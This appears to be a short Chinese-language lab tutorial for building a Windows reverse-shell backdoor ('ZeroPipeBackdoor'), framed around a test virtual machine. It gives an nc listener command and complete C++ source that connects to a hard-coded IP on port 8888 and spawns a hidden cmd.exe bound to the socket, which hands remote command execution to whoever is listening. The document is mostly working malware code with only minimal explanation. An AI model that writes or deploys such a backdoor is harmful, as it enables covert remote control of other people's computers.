零管道返回cmdshell
192.168.139.128
为虚拟机的IP地址。
实验步骤:
1 在虚拟机中开启nc -l -v -p 8888进行监听
2. 运行编译好的程序
虚拟机就会得到实体机的cmd了....
// ZeroPipeBackdoor.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <winsock2.h>
#pragma comment(lib, "WS2_32.lib") // 链接到WS2_32.lib
void cmdshell(SOCKET s)
{
char szSysDir[MAX_PATH] = {0};
GetSystemDirectory(szSysDir, MAX_PATH);
strcat(szSysDir, "\\cmd.exe");
STARTUPINFO si = {0};
GetStartupInfo(&si);
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.hStdInput = si.hStdOutput = si.hStdError = (void *)s;
PROCESS_INFORMATION pi = {0};
::CreateProcess(NULL, szSysDir, NULL, NULL, true, 0, NULL, NULL, &si, &pi );
::WaitForSingleObject(pi.hProcess, INFINITE);
}
int main(int argc, char* argv[])
{
char MyMessage[512] = {0};
strcpy(MyMessage, "backdoor start");
// 初始化WS2_32.dll
WSADATA wsaData;
WORD sockVersion = MAKEWORD(2, 2);
if(::WSAStartup(sockVersion, &wsaData) != 0)
{
return -1;
}
SOCKET s = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
if (s == INVALID_SOCKET)
{
return -1;
}
sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(8888);
sin.sin_addr.S_un.S_addr = inet_addr("192.168.139.128");
if ( connect(s, (sockaddr*)&sin, sizeof(sin)) == -1 )
{
int nErr = GetLastError();
return -1;
}
if (send(s, MyMessage, sizeof(MyMessage), 0) == SOCKET_ERROR)
{
printf("send error");
return -1;
}
cmdshell(s);
printf("Hello World!\n");
return 0;
}